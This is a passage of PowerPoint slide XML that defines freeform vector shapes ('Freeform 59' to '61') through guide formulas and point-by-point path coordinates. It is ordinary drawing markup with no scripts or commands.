                      <a:lnTo>
                        <a:pt x="388" y="782"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="288"/>
                      </a:ln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4" name="Freeform 59"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6457950" y="5819775"/>
                  <a:ext cx="219075" cy="220663"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 609"/>
                    <a:gd name="T1" fmla="*/ 310 h 611"/>
                    <a:gd name="T2" fmla="*/ 5 w 609"/>
                    <a:gd name="T3" fmla="*/ 236 h 611"/>
                    <a:gd name="T4" fmla="*/ 0 w 609"/>
                    <a:gd name="T5" fmla="*/ 199 h 611"/>
                    <a:gd name="T6" fmla="*/ 10 w 609"/>
                    <a:gd name="T7" fmla="*/ 169 h 611"/>
                    <a:gd name="T8" fmla="*/ 41 w 609"/>
                    <a:gd name="T9" fmla="*/ 110 h 611"/>
                    <a:gd name="T10" fmla="*/ 67 w 609"/>
                    <a:gd name="T11" fmla="*/ 84 h 611"/>
                    <a:gd name="T12" fmla="*/ 99 w 609"/>
                    <a:gd name="T13" fmla="*/ 58 h 611"/>
                    <a:gd name="T14" fmla="*/ 194 w 609"/>
                    <a:gd name="T15" fmla="*/ 5 h 611"/>
                    <a:gd name="T16" fmla="*/ 231 w 609"/>
                    <a:gd name="T17" fmla="*/ 0 h 611"/>
                    <a:gd name="T18" fmla="*/ 262 w 609"/>
                    <a:gd name="T19" fmla="*/ 0 h 611"/>
                    <a:gd name="T20" fmla="*/ 320 w 609"/>
                    <a:gd name="T21" fmla="*/ 26 h 611"/>
                    <a:gd name="T22" fmla="*/ 341 w 609"/>
                    <a:gd name="T23" fmla="*/ 52 h 611"/>
                    <a:gd name="T24" fmla="*/ 535 w 609"/>
                    <a:gd name="T25" fmla="*/ 320 h 611"/>
                    <a:gd name="T26" fmla="*/ 572 w 609"/>
                    <a:gd name="T27" fmla="*/ 368 h 611"/>
                    <a:gd name="T28" fmla="*/ 608 w 609"/>
                    <a:gd name="T29" fmla="*/ 399 h 611"/>
                    <a:gd name="T30" fmla="*/ 498 w 609"/>
                    <a:gd name="T31" fmla="*/ 478 h 611"/>
                    <a:gd name="T32" fmla="*/ 472 w 609"/>
                    <a:gd name="T33" fmla="*/ 463 h 611"/>
                    <a:gd name="T34" fmla="*/ 446 w 609"/>
                    <a:gd name="T35" fmla="*/ 441 h 611"/>
                    <a:gd name="T36" fmla="*/ 446 w 609"/>
                    <a:gd name="T37" fmla="*/ 489 h 611"/>
                    <a:gd name="T38" fmla="*/ 435 w 609"/>
                    <a:gd name="T39" fmla="*/ 520 h 611"/>
                    <a:gd name="T40" fmla="*/ 409 w 609"/>
                    <a:gd name="T41" fmla="*/ 552 h 611"/>
                    <a:gd name="T42" fmla="*/ 372 w 609"/>
                    <a:gd name="T43" fmla="*/ 583 h 611"/>
                    <a:gd name="T44" fmla="*/ 314 w 609"/>
                    <a:gd name="T45" fmla="*/ 610 h 611"/>
                    <a:gd name="T46" fmla="*/ 283 w 609"/>
                    <a:gd name="T47" fmla="*/ 610 h 611"/>
                    <a:gd name="T48" fmla="*/ 257 w 609"/>
                    <a:gd name="T49" fmla="*/ 604 h 611"/>
                    <a:gd name="T50" fmla="*/ 210 w 609"/>
                    <a:gd name="T51" fmla="*/ 573 h 611"/>
                    <a:gd name="T52" fmla="*/ 188 w 609"/>
                    <a:gd name="T53" fmla="*/ 552 h 611"/>
                    <a:gd name="T54" fmla="*/ 173 w 609"/>
                    <a:gd name="T55" fmla="*/ 530 h 611"/>
                    <a:gd name="T56" fmla="*/ 141 w 609"/>
                    <a:gd name="T57" fmla="*/ 473 h 611"/>
                    <a:gd name="T58" fmla="*/ 131 w 609"/>
                    <a:gd name="T59" fmla="*/ 441 h 611"/>
                    <a:gd name="T60" fmla="*/ 131 w 609"/>
                    <a:gd name="T61" fmla="*/ 415 h 611"/>
                    <a:gd name="T62" fmla="*/ 147 w 609"/>
                    <a:gd name="T63" fmla="*/ 363 h 611"/>
                    <a:gd name="T64" fmla="*/ 162 w 609"/>
                    <a:gd name="T65" fmla="*/ 336 h 611"/>
                    <a:gd name="T66" fmla="*/ 241 w 609"/>
                    <a:gd name="T67" fmla="*/ 242 h 611"/>
                    <a:gd name="T68" fmla="*/ 257 w 609"/>
                    <a:gd name="T69" fmla="*/ 216 h 611"/>
                    <a:gd name="T70" fmla="*/ 262 w 609"/>
                    <a:gd name="T71" fmla="*/ 199 h 611"/>
                    <a:gd name="T72" fmla="*/ 246 w 609"/>
                    <a:gd name="T73" fmla="*/ 158 h 611"/>
                    <a:gd name="T74" fmla="*/ 231 w 609"/>
                    <a:gd name="T75" fmla="*/ 132 h 611"/>
                    <a:gd name="T76" fmla="*/ 210 w 609"/>
                    <a:gd name="T77" fmla="*/ 121 h 611"/>
                    <a:gd name="T78" fmla="*/ 184 w 609"/>
                    <a:gd name="T79" fmla="*/ 121 h 611"/>
                    <a:gd name="T80" fmla="*/ 157 w 609"/>
                    <a:gd name="T81" fmla="*/ 137 h 611"/>
                    <a:gd name="T82" fmla="*/ 126 w 609"/>
                    <a:gd name="T83" fmla="*/ 169 h 611"/>
                    <a:gd name="T84" fmla="*/ 126 w 609"/>
                    <a:gd name="T85" fmla="*/ 184 h 611"/>
                    <a:gd name="T86" fmla="*/ 141 w 609"/>
                    <a:gd name="T87" fmla="*/ 236 h 611"/>
                    <a:gd name="T88" fmla="*/ 47 w 609"/>
                    <a:gd name="T89" fmla="*/ 320 h 611"/>
                    <a:gd name="T90" fmla="*/ 309 w 609"/>
                    <a:gd name="T91" fmla="*/ 294 h 611"/>
                    <a:gd name="T92" fmla="*/ 288 w 609"/>
                    <a:gd name="T93" fmla="*/ 320 h 611"/>
                    <a:gd name="T94" fmla="*/ 267 w 609"/>
                    <a:gd name="T95" fmla="*/ 352 h 611"/>
                    <a:gd name="T96" fmla="*/ 257 w 609"/>
                    <a:gd name="T97" fmla="*/ 378 h 611"/>
                    <a:gd name="T98" fmla="*/ 273 w 609"/>
                    <a:gd name="T99" fmla="*/ 441 h 611"/>
                    <a:gd name="T100" fmla="*/ 294 w 609"/>
                    <a:gd name="T101" fmla="*/ 463 h 611"/>
                    <a:gd name="T102" fmla="*/ 314 w 609"/>
                    <a:gd name="T103" fmla="*/ 478 h 611"/>
                    <a:gd name="T104" fmla="*/ 341 w 609"/>
                    <a:gd name="T105" fmla="*/ 483 h 611"/>
                    <a:gd name="T106" fmla="*/ 362 w 609"/>
                    <a:gd name="T107" fmla="*/ 473 h 611"/>
                    <a:gd name="T108" fmla="*/ 388 w 609"/>
                    <a:gd name="T109" fmla="*/ 452 h 611"/>
                    <a:gd name="T110" fmla="*/ 398 w 609"/>
                    <a:gd name="T111" fmla="*/ 420 h 611"/>
                    <a:gd name="T112" fmla="*/ 404 w 609"/>
                    <a:gd name="T113" fmla="*/ 405 h 611"/>
                    <a:gd name="T114" fmla="*/ 404 w 609"/>
                    <a:gd name="T115" fmla="*/ 389 h 611"/>
                    <a:gd name="T116" fmla="*/ 388 w 609"/>
                    <a:gd name="T117" fmla="*/ 352 h 611"/>
                    <a:gd name="T118" fmla="*/ 320 w 609"/>
                    <a:gd name="T119" fmla="*/ 258 h 6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609" h="611">
                      <a:moveTo>
                        <a:pt x="37" y="310"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="67" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="608" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="162" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="309" y="294"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="309" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="267" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="330" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="483"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="351" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="452"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="398" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="258"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="29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5" name="Freeform 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6584950" y="5710238"/>
                  <a:ext cx="166688" cy="227012"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 105 w 463"/>
                    <a:gd name="T1" fmla="*/ 110 h 631"/>
                    <a:gd name="T2" fmla="*/ 153 w 463"/>
                    <a:gd name="T3" fmla="*/ 168 h 631"/>
                    <a:gd name="T4" fmla="*/ 158 w 463"/>
                    <a:gd name="T5" fmla="*/ 168 h 631"/>
                    <a:gd name="T6" fmla="*/ 158 w 463"/>
                    <a:gd name="T7" fmla="*/ 168 h 631"/>
                    <a:gd name="T8" fmla="*/ 153 w 463"/>
                    <a:gd name="T9" fmla="*/ 120 h 631"/>
                    <a:gd name="T10" fmla="*/ 158 w 463"/>
                    <a:gd name="T11" fmla="*/ 84 h 631"/>
                    <a:gd name="T12" fmla="*/ 158 w 463"/>
                    <a:gd name="T13" fmla="*/ 84 h 631"/>
                    <a:gd name="T14" fmla="*/ 163 w 463"/>
                    <a:gd name="T15" fmla="*/ 62 h 631"/>
                    <a:gd name="T16" fmla="*/ 174 w 463"/>
                    <a:gd name="T17" fmla="*/ 47 h 631"/>
                    <a:gd name="T18" fmla="*/ 184 w 463"/>
                    <a:gd name="T19" fmla="*/ 32 h 631"/>
                    <a:gd name="T20" fmla="*/ 200 w 463"/>
                    <a:gd name="T21" fmla="*/ 15 h 631"/>
                    <a:gd name="T22" fmla="*/ 200 w 463"/>
                    <a:gd name="T23" fmla="*/ 15 h 631"/>
                    <a:gd name="T24" fmla="*/ 210 w 463"/>
                    <a:gd name="T25" fmla="*/ 10 h 631"/>
                    <a:gd name="T26" fmla="*/ 210 w 463"/>
                    <a:gd name="T27" fmla="*/ 10 h 631"/>
                    <a:gd name="T28" fmla="*/ 221 w 463"/>
                    <a:gd name="T29" fmla="*/ 0 h 631"/>
                    <a:gd name="T30" fmla="*/ 310 w 463"/>
                    <a:gd name="T31" fmla="*/ 110 h 631"/>
                    <a:gd name="T32" fmla="*/ 310 w 463"/>
                    <a:gd name="T33" fmla="*/ 110 h 631"/>
                    <a:gd name="T34" fmla="*/ 289 w 463"/>
                    <a:gd name="T35" fmla="*/ 120 h 631"/>
                    <a:gd name="T36" fmla="*/ 289 w 463"/>
                    <a:gd name="T37" fmla="*/ 120 h 631"/>
                    <a:gd name="T38" fmla="*/ 273 w 463"/>
                    <a:gd name="T39" fmla="*/ 136 h 631"/>
                    <a:gd name="T40" fmla="*/ 273 w 463"/>
                    <a:gd name="T41" fmla="*/ 136 h 631"/>
                    <a:gd name="T42" fmla="*/ 247 w 463"/>
                    <a:gd name="T43" fmla="*/ 162 h 631"/>
                    <a:gd name="T44" fmla="*/ 247 w 463"/>
                    <a:gd name="T45" fmla="*/ 162 h 631"/>
                    <a:gd name="T46" fmla="*/ 237 w 463"/>
                    <a:gd name="T47" fmla="*/ 179 h 631"/>
                    <a:gd name="T48" fmla="*/ 231 w 463"/>
                    <a:gd name="T49" fmla="*/ 199 h 631"/>
                    <a:gd name="T50" fmla="*/ 231 w 463"/>
                    <a:gd name="T51" fmla="*/ 199 h 631"/>
                    <a:gd name="T52" fmla="*/ 226 w 463"/>
                    <a:gd name="T53" fmla="*/ 215 h 631"/>
                    <a:gd name="T54" fmla="*/ 231 w 463"/>
                    <a:gd name="T55" fmla="*/ 236 h 631"/>
                    <a:gd name="T56" fmla="*/ 231 w 463"/>
                    <a:gd name="T57" fmla="*/ 236 h 631"/>
                    <a:gd name="T58" fmla="*/ 237 w 463"/>
                    <a:gd name="T59" fmla="*/ 257 h 631"/>
                    <a:gd name="T60" fmla="*/ 252 w 463"/>
                    <a:gd name="T61" fmla="*/ 278 h 631"/>
                    <a:gd name="T62" fmla="*/ 462 w 463"/>
                    <a:gd name="T63" fmla="*/ 540 h 631"/>
                    <a:gd name="T64" fmla="*/ 347 w 463"/>
                    <a:gd name="T65" fmla="*/ 630 h 631"/>
                    <a:gd name="T66" fmla="*/ 0 w 463"/>
                    <a:gd name="T67" fmla="*/ 194 h 631"/>
                    <a:gd name="T68" fmla="*/ 105 w 463"/>
                    <a:gd name="T69" fmla="*/ 110 h 6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63" h="631">
                      <a:moveTo>
                        <a:pt x="105" y="110"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="153" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="153" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="200" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="237" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="630"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="110"/>
                      </a:ln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6" name="Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6697663" y="5632450"/>
                  <a:ext cx="196850" cy="204788"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 263 w 547"/>
                    <a:gd name="T1" fmla="*/ 383 h 568"/>
                    <a:gd name="T2" fmla="*/ 299 w 547"/>
                    <a:gd name="T3" fmla="*/ 414 h 568"/>
                    <a:gd name="T4" fmla="*/ 336 w 547"/>
                    <a:gd name="T5" fmla="*/ 435 h 568"/>
                    <a:gd name="T6" fmla="*/ 373 w 547"/>
                    <a:gd name="T7" fmla="*/ 446 h 568"/>
                    <a:gd name="T8" fmla="*/ 389 w 547"/>
                    <a:gd name="T9" fmla="*/ 441 h 568"/>
                    <a:gd name="T10" fmla="*/ 404 w 547"/>
                    <a:gd name="T11" fmla="*/ 430 h 568"/>
                    <a:gd name="T12" fmla="*/ 426 w 547"/>
                    <a:gd name="T13" fmla="*/ 404 h 568"/>
                    <a:gd name="T14" fmla="*/ 426 w 547"/>
                    <a:gd name="T15" fmla="*/ 377 h 568"/>
                    <a:gd name="T16" fmla="*/ 415 w 547"/>
                    <a:gd name="T17" fmla="*/ 341 h 568"/>
                    <a:gd name="T18" fmla="*/ 489 w 547"/>
                    <a:gd name="T19" fmla="*/ 215 h 568"/>
                    <a:gd name="T20" fmla="*/ 515 w 547"/>
                    <a:gd name="T21" fmla="*/ 251 h 568"/>
                    <a:gd name="T22" fmla="*/ 546 w 547"/>
                    <a:gd name="T23" fmla="*/ 325 h 568"/>
                    <a:gd name="T24" fmla="*/ 546 w 547"/>
                    <a:gd name="T25" fmla="*/ 362 h 568"/>
                    <a:gd name="T26" fmla="*/ 525 w 547"/>
                    <a:gd name="T27" fmla="*/ 430 h 568"/>
                    <a:gd name="T28" fmla="*/ 467 w 547"/>
                    <a:gd name="T29" fmla="*/ 498 h 568"/>
                    <a:gd name="T30" fmla="*/ 441 w 547"/>
                    <a:gd name="T31" fmla="*/ 524 h 568"/>
                    <a:gd name="T32" fmla="*/ 389 w 547"/>
                    <a:gd name="T33" fmla="*/ 556 h 568"/>
                    <a:gd name="T34" fmla="*/ 363 w 547"/>
                    <a:gd name="T35" fmla="*/ 561 h 568"/>
                    <a:gd name="T36" fmla="*/ 310 w 547"/>
                    <a:gd name="T37" fmla="*/ 567 h 568"/>
                    <a:gd name="T38" fmla="*/ 268 w 547"/>
                    <a:gd name="T39" fmla="*/ 551 h 568"/>
                    <a:gd name="T40" fmla="*/ 226 w 547"/>
                    <a:gd name="T41" fmla="*/ 530 h 568"/>
                    <a:gd name="T42" fmla="*/ 184 w 547"/>
                    <a:gd name="T43" fmla="*/ 498 h 568"/>
                    <a:gd name="T44" fmla="*/ 110 w 547"/>
                    <a:gd name="T45" fmla="*/ 424 h 568"/>
                    <a:gd name="T46" fmla="*/ 42 w 547"/>
                    <a:gd name="T47" fmla="*/ 335 h 568"/>
                    <a:gd name="T48" fmla="*/ 21 w 547"/>
                    <a:gd name="T49" fmla="*/ 294 h 568"/>
                    <a:gd name="T50" fmla="*/ 6 w 547"/>
                    <a:gd name="T51" fmla="*/ 247 h 568"/>
                    <a:gd name="T52" fmla="*/ 0 w 547"/>
                    <a:gd name="T53" fmla="*/ 199 h 568"/>
                    <a:gd name="T54" fmla="*/ 11 w 547"/>
                    <a:gd name="T55" fmla="*/ 152 h 568"/>
                    <a:gd name="T56" fmla="*/ 21 w 547"/>
                    <a:gd name="T57" fmla="*/ 130 h 568"/>
                    <a:gd name="T58" fmla="*/ 58 w 547"/>
                    <a:gd name="T59" fmla="*/ 83 h 568"/>
                    <a:gd name="T60" fmla="*/ 84 w 547"/>
                    <a:gd name="T61" fmla="*/ 57 h 568"/>
                    <a:gd name="T62" fmla="*/ 152 w 547"/>
                    <a:gd name="T63" fmla="*/ 15 h 568"/>
                    <a:gd name="T64" fmla="*/ 173 w 547"/>
                    <a:gd name="T65" fmla="*/ 5 h 568"/>
                    <a:gd name="T66" fmla="*/ 257 w 547"/>
                    <a:gd name="T67" fmla="*/ 5 h 568"/>
                    <a:gd name="T68" fmla="*/ 299 w 547"/>
                    <a:gd name="T69" fmla="*/ 26 h 568"/>
                    <a:gd name="T70" fmla="*/ 342 w 547"/>
                    <a:gd name="T71" fmla="*/ 52 h 568"/>
                    <a:gd name="T72" fmla="*/ 426 w 547"/>
                    <a:gd name="T73" fmla="*/ 136 h 568"/>
                    <a:gd name="T74" fmla="*/ 236 w 547"/>
                    <a:gd name="T75" fmla="*/ 346 h 568"/>
                    <a:gd name="T76" fmla="*/ 247 w 547"/>
                    <a:gd name="T77" fmla="*/ 147 h 568"/>
                    <a:gd name="T78" fmla="*/ 231 w 547"/>
                    <a:gd name="T79" fmla="*/ 130 h 568"/>
                    <a:gd name="T80" fmla="*/ 210 w 547"/>
                    <a:gd name="T81" fmla="*/ 120 h 568"/>
                    <a:gd name="T82" fmla="*/ 179 w 547"/>
                    <a:gd name="T83" fmla="*/ 120 h 568"/>
                    <a:gd name="T84" fmla="*/ 163 w 547"/>
                    <a:gd name="T85" fmla="*/ 126 h 568"/>
                    <a:gd name="T86" fmla="*/ 147 w 547"/>
